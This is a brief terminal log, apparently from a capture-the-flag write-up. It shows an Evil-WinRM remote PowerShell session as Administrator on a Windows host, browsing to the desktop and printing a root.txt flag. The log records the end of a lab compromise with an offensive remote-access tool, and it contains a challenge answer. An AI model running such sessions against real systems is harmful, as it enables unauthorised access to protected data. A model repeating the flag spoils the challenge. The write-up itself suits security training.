Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> ls
Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/12/2026 6:25 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
9d728415de2b940f3f146f6296be66a3
*Evil-WinRM* PS C:\Users\Administrator\desktop>
.